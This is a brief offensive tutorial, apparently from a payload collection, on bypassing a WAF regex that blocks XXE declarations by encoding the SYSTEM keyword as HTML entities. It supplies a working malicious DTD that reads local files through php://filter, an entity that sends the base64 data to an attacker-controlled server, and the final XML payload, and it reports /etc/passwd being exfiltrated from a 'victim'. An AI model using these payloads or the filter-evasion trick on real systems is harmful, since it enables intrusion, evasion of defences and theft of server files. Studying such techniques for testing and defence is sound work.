A useful technique to bypass WAF forbidden words like SYSTEM is using html entities, the technique here can be used to avoid using blacklisted words.
This is also valid for a regex in this case we will bypass the following regex /<!(?:DOCTYPE|ENTITY)(?:\s|%|&#[0-9]+;|&#x[0-9a-fA-F]+;)+[^\s]+\s+(?:SYSTEM|PUBLIC)\s+[\'\"]/im
This regex is stopping us to create a external entity with the following structure:
<!ENTITY file SYSTEM "file:///path/to/file">
To avoid this we are going to use html entities to encode <!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >
so we can call our dtd in a server we control.
The html entity equivalent is <!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >
The idea here is to use this entity to bypass the SYSTEM word to call our controlled dtd. This way we only have to bypass the WAF/REGEX one time and we can craft any entity we need on our dtd.
We have to serve our dtd like the following:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/path/to/file">
<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://ourserver.com/bypass.xml?%data;'>">
%abt;
We can modify this payload as we need as this will not be blocked by the WAF or regex on the victim.
The following payload will call our external dtd bypassing the SYSTEM blacklisted word:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "<!ENTITY % dtd SYSTEM "http://ourserver.com/bypass.dtd" >" >%a;%dtd;]><data><env>&exfil;</env></data>
And all we need to do is sending the payload and wait for the exfil in our server And we can see is the base64 of the /etc/passwd